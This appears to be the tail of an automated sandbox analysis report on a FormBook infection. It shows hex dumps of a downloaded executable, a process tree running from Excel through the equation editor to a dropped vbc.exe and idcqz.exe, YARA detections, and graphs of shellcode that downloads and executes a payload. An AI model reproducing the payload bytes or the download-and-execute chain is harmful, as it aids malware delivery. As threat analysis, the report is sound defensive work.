00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@
        May 13, 2022 16:42:02.572815895 CEST5INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 8a 7a 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 84 82 40 00 e9 42 01 00 00 53 56 8b 35 b0 8a 7a 00 8d 45 a4
        Data Ascii: U\}t+}FEuHzHPuuu@BSV5zEWPu@eEEPu@}e`@FRVVU+MM3FQNUMVTUFPEEPM\@EEPEPu
        May 13, 2022 16:42:02.572873116 CEST6INData Raw: 7a 00 e9 f9 16 00 00 8b 88 80 8b 7a 00 89 88 20 8b 7a 00 e9 e8 16 00 00 8b 45 d8 8d 34 85 20 8b 7a 00 33 c0 8b 0e 3b cb 0f 94 c0 23 4d dc 8b 44 85 d0 89 0e e9 d2 16 00 00 8b 45 d4 ff 34 85 20 8b 7a 00 57 e9 31 16 00 00 8b 0d 70 7a 7a 00 8b 35 50
        Data Ascii: zz zE4 z3;#MDE4 zW1pzz5P@;tuQEzz;PQjuP@nmjPEJ;tZj\VIf>ff;u9]tCFtuEuF;t=uu
        May 13, 2022 16:42:02.572926998 CEST7INData Raw: 89 1f 66 89 9f fe 07 00 00 e9 b8 11 00 00 8b 75 e4 53 e8 09 13 00 00 6a 01 8b f8 89 55 f0 e8 fd 12 00 00 59 3b f3 59 89 55 f0 75 08 3b f8 7c 08 7e 8a eb 12 3b f8 73 08 8b 45 dc e9 91 11 00 00 0f 86 76 ff ff ff 8b 45 e0 e9 83 11 00 00 6a 01 e8 cb
        Data Ascii: fuSjUY;YUu;|~;sEvEjjUuYUYE$L-@_+X;tSC#323;;u3;t;t3F;t3E
        May 13, 2022 16:42:02.572988033 CEST9INData Raw: 00 ff 75 ac eb 47 53 e8 fc 0d 00 00 8b f0 56 6a eb e8 1c 37 00 00 56 e8 97 3c 00 00 8b f0 3b f3 0f 84 6a 09 00 00 39 5d d8 74 21 56 e8 17 4b 00 00 39 5d d4 7c 0b 50 ff 75 f4 e8 d8 45 00 00 eb 0b 3b c3 74 07 c7 45 fc 01 00 00 00 56 ff 15 24 81 40
        Data Ascii: uGSVj7V<;j9]t!VK9]|PuE;tEV$@4jPI;tvuEvQEffjuMEQPjIEf;fEVj@8@;EjIjEIuEVSuU
        May 13, 2022 16:42:02.573049068 CEST10INData Raw: 00 00 8d 44 00 02 83 fe 04 75 12 6a 03 e8 9a 08 00 00 59 a3 f8 b5 40 00 56 89 55 c8 58 83 fe 03 75 0f 68 00 18 00 00 57 53 ff 75 dc e8 6e 0e 00 00 50 57 ff 75 f0 53 ff 75 bc ff 75 08 ff 15 0c 80 40 00 85 c0 75 03 89 5d fc ff 75 08 e9 d3 00 00 00
        Data Ascii: DujY@VUXuhWSunPWuSuu@u]uhj3i;fMEQMWQSPV@3Au.}t9Mt}uEEt739]WE!@ffM^h>j;YUfn9]M
        May 13, 2022 16:42:02.573088884 CEST12INData Raw: 08 e8 f8 37 00 00 57 ff 15 34 81 40 00 83 4d c8 ff 53 53 ff 75 08 ff 75 c8 e8 47 09 00 00 ff 75 08 8b f8 ff 15 24 81 40 00 6a f3 3b fb 5e 7d 13 6a ef 5e ff 75 c0 ff 15 70 81 40 00 c7 45 fc 01 00 00 00 56 e9 96 f8 ff ff 53 e8 23 03 00 00 8b f8 59
        Data Ascii: 7W4@MSSuuGu$@j;^}j^up@EVS#Y;=zUEi5z;|uVu;Q+MtjYUEuFP;NEM9]JW?S YU09]t"9]
        May 13, 2022 16:42:02.573137045 CEST13INData Raw: c0 74 d0 ff 75 fc ff 15 10 80 40 00 6a 03 e8 dc 3a 00 00 85 c0 75 1e ff 75 0c ff 75 08 ff 15 18 80 40 00 eb 1b ff 75 fc ff 15 10 80 40 00 b8 eb 03 00 00 eb 0b 6a 00 56 ff 75 0c ff 75 08 ff d0 5f 5e 5b c9 c2 0c 00 55 8b ec 81 ec 80 00 00 00 81 7d
        Data Ascii: tu@j:uuu@u@jVuu_^[U}ujhju@@E}uEF=zT@u @PEQPT@EPuD@EPhu,30y@y;rPjdQ@UV39ut
        May 13, 2022 16:42:02.573175907 CEST15INData Raw: 79 00 2b 35 60 ce 40 00 57 03 74 24 14 ff 15 f8 80 40 00 33 db 05 f4 01 00 00 3b f3 a3 ac 8a 7a 00 0f 8e 2a 01 00 00 ff 35 44 f7 79 00 e8 46 01 00 00 53 53 ff 35 60 ce 40 00 ff 35 1c a0 40 00 ff 15 60 81 40 00 89 35 40 f7 79 00 89 1d 30 f7 79 00
        Data Ascii: y+5`@Wt$@3;z*5DyFSS5`@5@`@5@y0y0x8y@+Dy;07yWV=Dy5h@=l@9zt)9@zu!@yS+4y+D$`@0yYhh@-p@t@26|j5p@+t!VU5@
        May 13, 2022 16:42:02.573216915 CEST16INData Raw: 72 50 0f b7 05 3e a3 40 00 99 0f a4 c2 10 c1 e0 10 8b d8 0f b7 05 3c a3 40 00 0f b7 0d 38 a3 40 00 99 0b d8 0f b7 05 3a a3 40 00 c1 e0 10 0b c1 33 c9 99 0b c8 8b c3 0b c2 8b 17 3b d1 75 07 8b 57 04 3b d0 74 0a 4f 4f 81 ff 00 30 7b 00 73 e9 33 db
        Data Ascii: rP>@<@8@:@3;uW;tOO0{s30{E@rAfW&=Wh8{.,Wh@{#,]LzE!h,@V,th(@V,h@V+H{WV(@Vt h!
        May 13, 2022 16:42:02.687007904 CEST17INData Raw: 50 ff 74 24 2c ff 74 24 2c 68 00 00 00 80 57 56 68 80 00 00 00 ff 15 24 82 40 00 a3 68 1f 7a 00 57 e8 eb d4 ff ff 85 c0 74 08 6a 02 58 e9 bf 00 00 00 e8 c2 00 00 00 39 3d 40 8b 7a 00 0f 85 83 00 00 00 6a 05 ff 35 68 1f 7a 00 ff 15 50 82 40 00 68
        Data Ascii: Pt$,t$,hWVh$@hzWtjX9=@zj5hzP@h<@v*uh0@h*5(@@SUWuSh@WS-dzz@zzWih@@WP5z,@jVj+Wt9=lzzNj.Bj"3_^


        Click to jump to process

        Click to jump to process

        Click to dive into process behavior distribution

        Click to jump to process

        Target ID:0
        Start time:16:42:16
        Start date:13/05/2022
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Imagebase:0x13f080000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Target ID:2
        Start time:16:42:40
        Start date:13/05/2022
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        Target ID:4
        Start time:16:42:44
        Start date:13/05/2022
        Path:C:\Users\Public\vbc.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\Public\vbc.exe"
        Imagebase:0x400000
        File size:255769 bytes
        MD5 hash:029BBE98A216416EB698CA543A5C0830
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        Reputation:low

        Target ID:5
        Start time:16:42:47
        Start date:13/05/2022
        Path:C:\Users\user\AppData\Local\Temp\idcqz.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
        Imagebase:0xb50000
        File size:80384 bytes
        MD5 hash:51F62DEF6DC686B87CC0BAFC31685546
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
        Reputation:low

        Target ID:6
        Start time:16:42:47
        Start date:13/05/2022
        Path:C:\Users\user\AppData\Local\Temp\idcqz.exe
        Wow64 process (32bit):
        Commandline:C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
        Imagebase:
        File size:80384 bytes
        MD5 hash:51F62DEF6DC686B87CC0BAFC31685546
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:low

        Reset < >

          Execution Graph

          Execution Coverage:7.3%
          Dynamic/Decrypted Code Coverage:0%
          Signature Coverage:51.3%
          Total number of Nodes:187
          Total number of Limit Nodes:3
          execution_graph 1566 37900b8 1568 379006e 1566->1568 1593 37902fd ExitProcess 1568->1593 1594 3790309 1593->1594 1595 3790316 21 API calls 1593->1595 1596 3790332 18 API calls 1594->1596 1595->1594 1601 3790323 1596->1601 1597 379036b 1598 37903a4 1599 37903bc 11 API calls 1598->1599 1600 37903a9 1599->1600 1603 3790411 8 API calls 1600->1603 1605 37903cd URLDownloadToFileW 1600->1605 1601->1597 1601->1598 1601->1600 1602 3790351 1601->1602 1602->1600 1604 3790353 1602->1604 1603->1605 1607 379038d 15 API calls 1604->1607 1608 379042a 5 API calls 1605->1608 1607->1597 1609 379041a 1608->1609 1610 379043f 3 API calls 1609->1610 1611 3790431 1610->1611 1612 3790439 ShellExecuteW 1611->1612 1614 37902eb 1611->1614 1613 3790464 ExitProcess 1612->1613 1615 3790458 1613->1615 1617 3790316 1614->1617 1615->1614 1616 3790467 ExitProcess 1615->1616 1618 379031c 1617->1618 1619 3790332 18 API calls 1618->1619 1624 3790323 1618->1624 1619->1624 1620 379036b 1621 37903a4 1622 37903bc 11 API calls 1621->1622 1623 37903a9 1622->1623 1626 3790411 8 API calls 1623->1626 1628 37903cd URLDownloadToFileW 1623->1628 1624->1620 1624->1621 1624->1623 1625 3790351 1624->1625 1625->1623 1627 3790353 1625->1627 1626->1628 1630 379038d 15 API calls 1627->1630 1631 379042a 5 API calls 1628->1631 1630->1620 1632 379041a 1631->1632 1633 379043f 3 API calls 1632->1633 1634 3790431 1633->1634 1635 3790439 ShellExecuteW 1634->1635 1637 3790309 1634->1637 1636 3790464 ExitProcess 1635->1636 1638 3790458 1636->1638 1640 3790332 1637->1640 1638->1637 1639 3790467 ExitProcess 1638->1639 1641 3790338 1640->1641 1667 3790359 1641->1667 1668 379035c 1667->1668 1669 379038d 15 API calls 1668->1669 1670 379036b 1669->1670 1671 37900ba 1672 379006e 1671->1672 1673 37902fd 25 API calls 1672->1673 1674 37902eb 1673->1674 1675 3790316 21 API calls 1674->1675 1676 3790309 1675->1676 1677 3790332 18 API calls 1676->1677 1682 3790323 1677->1682 1678 379036b 1679 37903a4 1680 37903bc 11 API calls 1679->1680 1681 37903a9 1680->1681 1684 3790411 8 API calls 1681->1684 1686 37903cd URLDownloadToFileW 1681->1686 1682->1678 1682->1679 1682->1681 1683 3790351 1682->1683 1683->1681 1685 3790353 1683->1685 1684->1686 1688 379038d 15 API calls 1685->1688 1689 379042a 5 API calls 1686->1689 1688->1678 1690 379041a 1689->1690 1691 379043f 3 API calls 1690->1691 1692 3790431 1691->1692 1693 3790439 ShellExecuteW 1692->1693 1695 379049e 1692->1695 1694 3790464 ExitProcess 1693->1694 1696 3790458 1694->1696 1696->1695 1697 3790467 ExitProcess 1696->1697 1725 37902dd 1726 37902eb 1725->1726 1727 37902fd 25 API calls 1725->1727 1728 3790316 21 API calls 1726->1728 1727->1726 1729 3790309 1728->1729 1730 3790332 18 API calls 1729->1730 1735 3790323 1730->1735 1731 379036b 1732 37903a4 1733 37903bc 11 API calls 1732->1733 1734 37903a9 1733->1734 1737 3790411 8 API calls 1734->1737 1739 37903cd URLDownloadToFileW 1734->1739 1735->1731 1735->1732 1735->1734 1736 3790351 1735->1736 1736->1734 1738 3790353 1736->1738 1737->1739 1741 379038d 15 API calls 1738->1741 1742 379042a 5 API calls 1739->1742 1741->1731 1743 379041a 1742->1743 1744 379043f 3 API calls 1743->1744 1745 3790431 1744->1745 1746 3790439 ShellExecuteW 1745->1746 1748 379049e 1745->1748 1747 3790464 ExitProcess 1746->1747 1749 3790458 1747->1749 1749->1748 1750 3790467 ExitProcess 1749->1750 1503 379046b GetPEB 1504 3790479 1503->1504 1505 379038d 1506 379038f 1505->1506 1509 37903a2 LoadLibraryW 1506->1509 1510 37903a4 1509->1510 1525 37903bc 1510->1525 1514 37903cd URLDownloadToFileW 1539 379042a 1514->1539 1520 3790439 ShellExecuteW 1554 3790464 1520->1554 1522 3790394 1523 3790458 1523->1522 1524 3790467 ExitProcess 1523->1524 1526 37903bf 1525->1526 1527 3790411 8 API calls 1526->1527 1528 37903cd URLDownloadToFileW 1527->1528 1530 379042a 5 API calls 1528->1530 1531 379041a 1530->1531 1532 379043f 3 API calls 1531->1532 1533 3790431 1532->1533 1534 3790439 ShellExecuteW 1533->1534 1536 37903a9 1533->1536 1535 3790464 ExitProcess 1534->1535 1537 3790458 1535->1537 1536->1514 1556 3790411 URLDownloadToFileW 1536->1556 1537->1536 1538 3790467 ExitProcess 1537->1538 1540 379042c 1539->1540 1541 3790431 1540->1541 1542 379043f 3 API calls 1540->1542 1543 3790439 ShellExecuteW 1541->1543 1546 379041a 1541->1546 1542->1541 1544 3790464 ExitProcess 1543->1544 1545 3790458 1544->1545 1545->1546 1547 3790467 ExitProcess 1545->1547 1548 379043f 1546->1548 1549 3790442 ShellExecuteW 1548->1549 1550 3790458 1549->1550 1551 3790464 ExitProcess 1549->1551 1552 3790431 1550->1552 1553 3790467 ExitProcess 1550->1553 1551->1550 1552->1520 1552->1522 1555 3790467 ExitProcess 1554->1555 1557 379041a 1556->1557 1558 379042a 5 API calls 1556->1558 1559 379043f 3 API calls 1557->1559 1558->1557 1560 3790431 1559->1560 1561 3790439 ShellExecuteW 1560->1561 1564 379049e 1560->1564 1562 3790464 ExitProcess 1561->1562 1563 3790458 1562->1563 1563->1564 1565 3790467 ExitProcess 1563->1565 1564->1514 1940 3790000 1941 3790023 1940->1941 1944 37900a9 1941->1944 1946 379006e 1944->1946 1945 37902fd 25 API calls 1947 37902eb 1945->1947 1946->1945 1948 3790316 21 API calls 1947->1948 1949 3790309 1948->1949 1950 3790332 18 API calls 1949->1950 1955 3790323 1950->1955 1951 379036b 1952 37903a4 1953 37903bc 11 API calls 1952->1953 1954 37903a9 1953->1954 1957 3790411 8 API calls 1954->1957 1959 37903cd URLDownloadToFileW 1954->1959 1955->1951 1955->1952 1955->1954 1956 3790351 1955->1956 1956->1954 1958 3790353 1956->1958 1957->1959 1961 379038d 15 API calls 1958->1961 1962 379042a 5 API calls 1959->1962 1961->1951 1963 379041a 1962->1963 1964 379043f 3 API calls 1963->1964 1965 3790431 1964->1965 1966 3790439 ShellExecuteW 1965->1966 1968 3790077 1965->1968 1967 3790464 ExitProcess 1966->1967 1969 3790458 1967->1969 1969->1968 1970 3790467 ExitProcess 1969->1970 2025 3790067 2026 379006c 2025->2026 2027 37900a9 28 API calls 2026->2027 2028 3790077 2027->2028

          Callgraph

          • Executed
          • Not Executed
          • Opacity -> Relevance
          • Disassembly available
          callgraph 0 Function_037900B8 2 Function_037902FD 0->2 3 Function_037903BC 0->3 5 Function_0379043F 0->5 7 Function_03790332 0->7 11 Function_0379042A 0->11 16 Function_03790464 0->16 23 Function_03790411 0->23 27 Function_03790316 0->27 30 Function_0379038D 0->30 1 Function_037900BA 1->2 1->3 1->5 1->7 1->11 1->16 1->23 1->27 1->30 2->3 2->5 2->7 2->11 2->16 2->23 2->27 2->30 3->5 3->11 3->16 3->23 4 Function_037900BC 4->2 4->3 4->5 4->7 4->11 4->16 4->23 4->27 4->30 5->16 6 Function_03790130 7->3 7->5 7->11 7->16 17 Function_037904E4 7->17 19 Function_03790359 7->19 7->23 7->30 8 Function_037900A9 8->2 8->3 8->5 8->7 8->11 8->16 8->23 8->27 8->30 9 Function_037900E9 9->2 9->3 9->5 9->7 9->11 9->16 9->23 9->27 9->30 10 Function_0379046B 25 Function_03790493 10->25 11->5 11->16 12 Function_037900E1 12->2 12->3 12->5 12->7 12->11 12->16 12->23 12->27 12->30 13 Function_037900E3 13->2 13->3 13->5 13->7 13->11 13->16 13->23 13->27 13->30 14 Function_037903A2 14->3 14->5 14->11 14->16 14->23 15 Function_037900E5 15->2 15->3 15->5 15->7 15->11 15->16 15->23 15->27 15->30 18 Function_03790067 18->8 19->30 20 Function_037900DD 20->2 20->3 20->5 20->7 20->11 20->16 20->23 20->27 20->30 21 Function_037902DD 21->2 21->3 21->5 21->7 21->11 21->16 21->23 21->27 21->30 22 Function_0379009E 23->5 23->11 23->16 24 Function_037900D1 24->2 24->3 24->5 24->7 24->11 24->16 24->23 24->27 24->30 26 Function_03790112 26->2 26->3 26->5 26->7 26->11 26->16 26->23 26->27 26->30 27->3 27->5 27->7 27->11 27->16 27->17 27->23 27->30 28 Function_037900C9 28->2 28->3 28->5 28->7 28->11 28->16 28->23 28->27 28->30 29 Function_037902C9 30->14 31 Function_037900CD 31->2 31->3 31->5 31->7 31->11 31->16 31->23 31->27 31->30 32 Function_03790000 32->8

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 37903a2-37903c7 LoadLibraryW call 37903bc 8 37903cd-3790437 URLDownloadToFileW call 379042a call 379043f 0->8 9 37903c8 call 3790411 0->9 19 3790439-3790459 ShellExecuteW call 3790464 8->19 20 379049e-37904aa 8->20 9->8 29 379045b 19->29 30 37904c4-37904c8 19->30 22 37904ad 20->22 23 37904af-37904b3 22->23 24 37904b5-37904b9 22->24 23->24 26 37904c1 23->26 27 37904bb-37904bf 24->27 28 37904ce-37904d0 24->28 26->30 27->26 27->28 33 37904e0-37904e1 28->33 29->22 34 379045d 29->34 31 37904ca 30->31 32 37904cc 30->32 31->28 32->28 35 37904d2-37904db 32->35 34->28 36 379045f-3790469 ExitProcess 34->36 39 37904dd 35->39 40 37904a4-37904a7 35->40 39->33 40->35 41 37904a9 40->41 41->22
          APIs
          • LoadLibraryW.KERNEL32(03790394), ref: 037903A2
            • Part of subcall function 037903BC: URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
            • Part of subcall function 037903BC: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
            • Part of subcall function 037903BC: ExitProcess.KERNEL32(00000000), ref: 03790469
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
          • String ID:
          • API String ID: 2508257586-0
          • Opcode ID: 9e410da5812810ea819573611e6671a126a9b3eb79f652d015569224d09adc25
          • Instruction ID: 627d91cd667f6068ceb5b3aa431881b35b12a98fffb647ebaa4189b931d2ce18
          • Opcode Fuzzy Hash: 9e410da5812810ea819573611e6671a126a9b3eb79f652d015569224d09adc25
          • Instruction Fuzzy Hash: 8E21699286C3C16FEB1393302C6EB65BF246F67104F688ACFE1C2090E3E2985041C756
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 43 3790316 44 379031c 43->44 45 3790317 call 37904e4 43->45 46 3790323-3790324 44->46 47 379031e call 3790332 44->47 45->44 48 3790377-3790396 46->48 49 3790327 46->49 47->46 51 3790398-37903a0 48->51 50 3790329-379032c 49->50 49->51 53 379032f 50->53 54 3790394-3790395 50->54 55 3790331-3790340 53->55 56 37903a4-37903b1 call 37903bc 53->56 54->51 58 37903b2-37903b7 55->58 59 3790342-3790347 55->59 56->58 62 37903ba-37903c3 58->62 59->58 61 3790349 59->61 61->62 64 379034b-379034f 61->64 65 37903c5-37903c7 62->65 64->56 66 3790351 64->66 67 37903cd-3790437 URLDownloadToFileW call 379042a call 379043f 65->67 68 37903c8 call 3790411 65->68 66->65 70 3790353-3790374 call 379038d 66->70 82 3790439-3790459 ShellExecuteW call 3790464 67->82 83 379049e-37904aa 67->83 68->67 70->48 92 379045b 82->92 93 37904c4-37904c8 82->93 85 37904ad 83->85 86 37904af-37904b3 85->86 87 37904b5-37904b9 85->87 86->87 89 37904c1 86->89 90 37904bb-37904bf 87->90 91 37904ce-37904d0 87->91 89->93 90->89 90->91 96 37904e0-37904e1 91->96 92->85 97 379045d 92->97 94 37904ca 93->94 95 37904cc 93->95 94->91 95->91 98 37904d2-37904db 95->98 97->91 99 379045f-3790469 ExitProcess 97->99 102 37904dd 98->102 103 37904a4-37904a7 98->103 102->96 103->98 104 37904a9 103->104 104->85
          APIs
          • URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
          • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
          • ExitProcess.KERNEL32(00000000), ref: 03790469
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadExecuteExitFileProcessShell
          • String ID:
          • API String ID: 3584569557-0
          • Opcode ID: 1c7901c4471e083daa73aa8b6e0eb38c1a7ea571af8d8655df4c016988981347
          • Instruction ID: 169fada721d1f8fc660c445aacdf3cd197d2e2a4f5f73c50de07dea388fc2669
          • Opcode Fuzzy Hash: 1c7901c4471e083daa73aa8b6e0eb38c1a7ea571af8d8655df4c016988981347
          • Instruction Fuzzy Hash: 90419A9686D3C1AFEB12D7302D6A665BF647F5B200F1C8BCFD5C20D0A3E2589145C356
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 106 3790332-3790340 call 37904e4 call 3790359 111 37903b2-37903b7 106->111 112 3790342-3790347 106->112 114 37903ba-37903c3 111->114 112->111 113 3790349 112->113 113->114 115 379034b-379034f 113->115 116 37903c5-37903c7 114->116 117 3790351 115->117 118 37903a4-37903b1 call 37903bc 115->118 119 37903cd-3790437 URLDownloadToFileW call 379042a call 379043f 116->119 120 37903c8 call 3790411 116->120 117->116 123 3790353-37903a0 call 379038d 117->123 118->111 140 3790439-3790459 ShellExecuteW call 3790464 119->140 141 379049e-37904aa 119->141 120->119 150 379045b 140->150 151 37904c4-37904c8 140->151 143 37904ad 141->143 144 37904af-37904b3 143->144 145 37904b5-37904b9 143->145 144->145 147 37904c1 144->147 148 37904bb-37904bf 145->148 149 37904ce-37904d0 145->149 147->151 148->147 148->149 154 37904e0-37904e1 149->154 150->143 155 379045d 150->155 152 37904ca 151->152 153 37904cc 151->153 152->149 153->149 156 37904d2-37904db 153->156 155->149 157 379045f-3790469 ExitProcess 155->157 160 37904dd 156->160 161 37904a4-37904a7 156->161 160->154 161->156 162 37904a9 161->162 162->143
          APIs
          • URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
          • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
          • ExitProcess.KERNEL32(00000000), ref: 03790469
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadExecuteExitFileProcessShell
          • String ID:
          • API String ID: 3584569557-0
          • Opcode ID: f2807f76756f8fc4b041f247abd3dc8aafc58987c362963f7d389fda5a1837c8
          • Instruction ID: a3c0eac8e7a6ca979236c6118ae22de3fa93acfc47b480ca2b5784bb1c105224
          • Opcode Fuzzy Hash: f2807f76756f8fc4b041f247abd3dc8aafc58987c362963f7d389fda5a1837c8
          • Instruction Fuzzy Hash: 2141AB9686D3C16FEB12D7302D6E795BF646F57100F1C8BCF94C2090A3E2589105C356
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 164 37903bc-3790437 call 3790411 URLDownloadToFileW call 379042a call 379043f 177 3790439-3790459 ShellExecuteW call 3790464 164->177 178 379049e-37904aa 164->178 187 379045b 177->187 188 37904c4-37904c8 177->188 180 37904ad 178->180 181 37904af-37904b3 180->181 182 37904b5-37904b9 180->182 181->182 184 37904c1 181->184 185 37904bb-37904bf 182->185 186 37904ce-37904d0 182->186 184->188 185->184 185->186 191 37904e0-37904e1 186->191 187->180 192 379045d 187->192 189 37904ca 188->189 190 37904cc 188->190 189->186 190->186 193 37904d2-37904db 190->193 192->186 194 379045f-3790469 ExitProcess 192->194 197 37904dd 193->197 198 37904a4-37904a7 193->198 197->191 198->193 199 37904a9 198->199 199->180
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadExecuteExitFileProcessShell
          • String ID:
          • API String ID: 3584569557-0
          • Opcode ID: 8ed43dcfad24570c8e2fdfe7124c993424f27bf4bdc89aeb0ce8938b4c1aa23a
          • Instruction ID: 619c2c19f44140f9ff5f383fedbb5ef9710512d26ffaaa30f99f2165d7659b88
          • Opcode Fuzzy Hash: 8ed43dcfad24570c8e2fdfe7124c993424f27bf4bdc89aeb0ce8938b4c1aa23a
          • Instruction Fuzzy Hash: D021259295D3C1AFEF1397301C6EB65BF646F67600F688ACFE1C6094E3E6988041C762
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 201 3790411-3790413 URLDownloadToFileW 202 379041a-3790437 call 379043f 201->202 203 3790415 call 379042a 201->203 207 3790439-3790459 ShellExecuteW call 3790464 202->207 208 379049e-37904aa 202->208 203->202 217 379045b 207->217 218 37904c4-37904c8 207->218 210 37904ad 208->210 211 37904af-37904b3 210->211 212 37904b5-37904b9 210->212 211->212 214 37904c1 211->214 215 37904bb-37904bf 212->215 216 37904ce-37904d0 212->216 214->218 215->214 215->216 221 37904e0-37904e1 216->221 217->210 222 379045d 217->222 219 37904ca 218->219 220 37904cc 218->220 219->216 220->216 223 37904d2-37904db 220->223 222->216 224 379045f-3790469 ExitProcess 222->224 227 37904dd 223->227 228 37904a4-37904a7 223->228 227->221 228->223 229 37904a9 228->229 229->210
          APIs
          • URLDownloadToFileW.URLMON(00000000,037903CD,?,00000000,00000000), ref: 03790413
            • Part of subcall function 0379042A: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03790451
            • Part of subcall function 0379042A: ExitProcess.KERNEL32(00000000), ref: 03790469
          Memory Dump Source
          • Source File: 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_3790000_EQNEDT32.jbxd
          Similarity
          • API ID: DownloadExecuteExitFileProcessShell
          • String ID:
          • API String ID: 3584569557-0
          • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
          • Instruction ID: a7e0570f1347179f0ce845503f3c389b3411a84a9c7330d61a156d9ea7214428
          • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
          • Instruction Fuzzy Hash: E7F0279466D340E9FE21E3746C8EFAA6E149F93B00F540A9BB1554D0F3E5908400C215
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
